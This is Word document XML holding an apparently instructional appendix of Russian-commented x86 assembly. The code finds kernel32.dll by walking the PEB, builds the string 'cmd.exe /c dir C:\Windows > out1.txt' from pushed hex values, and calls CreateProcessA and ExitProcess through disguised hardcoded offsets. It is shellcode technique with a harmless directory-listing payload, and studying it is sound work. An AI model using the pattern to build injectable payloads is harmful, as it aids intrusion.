    <w:p w14:paraId="7A73B2A4" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global _start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43992607" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6554BC79" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>_start:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECF574D" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Получение</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PEB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>через</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> TEB (Thread Environment Block)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73553402" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac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ax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26B9277D" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRPr="007C4A57" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    add</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, 0</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">10            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>EAX</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">10 (смещение к </w:t>
      </w:r>
      <w:r>
        <w:t>PEB</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>TEB</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CBC81" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ec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[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fs:eax</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>+0x20] ; PEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57486F63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[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fs:eax</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>+0x20] ; PEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E61098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[eax+0x0c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>] ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PEB-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ldr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="651752B6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[eax+0x14</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>] ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ldr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>InMemoryOrderModuleList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4ACCF27F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d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[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">   ; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Первы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(ntdll.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337FDEEF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dx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B9846C6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d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[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">   ; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Второ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(kernel32.dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDFEC81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dx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4880CAC8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[eax+0x10</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>] ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kernel32.dll base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF04429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di</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7382C8" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6CFABC" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ; "cmd.exe /c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c:\\Windows &gt; output.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DBF476" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac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dx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="693E1780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</w:p>
    <w:p w14:paraId="0E187207" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac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cx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5ADB38EE" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push 0x7478742e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2723D9C1" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push 0x3174756f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25658C0B" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push 0x203e2073</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BA4E0C" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push 0x776f646e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D510A35" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push 0x69575c3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09018A05" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push 0x43207269</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B189179" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push 0x6420632f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18919684" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push 0x20657865</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24480B57" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push 0x2e646d63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE7C3B8" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C761C" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185BEB36" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ; STARTUPINFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195B44B2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5D671E7A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580928E7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7273060C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41BBFC49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63CA5528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6431DB29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67B1A8DB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25A7C828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30B65DE8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5F3D49AC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4D4034C2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3334D82F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0D565786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446857FE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72047A78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30DB4D93" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push 68 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cb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STARTUPINFO) = 68 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683BBD2B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ax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D5005F" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447C2FFA" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ; PROCESS_INFORMATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B496023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78FA0224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2A3120C8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39C35C51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NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B96A18" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRPr="004D4772" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mov</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6227C5F3" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRPr="004D4772" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE1F410" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRPr="004D4772" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    ; Подготовка аргументов для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CreateProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="395CDC29" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">push </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eb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lpProcessInformation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A76DC46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a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lpStartupInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CED38ED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lpCurrentDirectory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADD196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lpEnvironment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4E3A24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dwCreationFlags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1937F8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bInheritHandles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0484E41D" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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lpThreadAttributes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792FD6CB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lpProcessAttributes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5014AB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c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lpCommandLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A35C5C2" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    push </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lpApplicationName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF04A97" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6A55A6" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7664B67D" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CreateProcessA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10B9DCEA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di</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455CA817" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac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si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EA96535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si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 0b</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0110101000101010 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0x00035150 / 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139C567B" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> esi,3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE774F" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>eax,esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="13240E9C" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6951225A" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ebx,eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="689FD2ED" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566BAE14" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C022940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di</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F58358" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac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si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5ABCB3FD" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 0b</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1001101010001000 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0x00026A20 / 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451D5D7" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> esi,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22856649" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>eax,esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="72B1B570" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="230C667A" w14:textId="565AF837" w:rsidR="00B91720" w:rsidRPr="00B91720" w:rsidRDefault="00B91720" w:rsidP="00B91720">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4772">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC423B9" w14:textId="123477EC" w:rsidR="00B91720" w:rsidRPr="004D4772" w:rsidRDefault="00B91720" w:rsidP="00B91720">
      <w:pPr>
        <w:pStyle w:val="af9"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
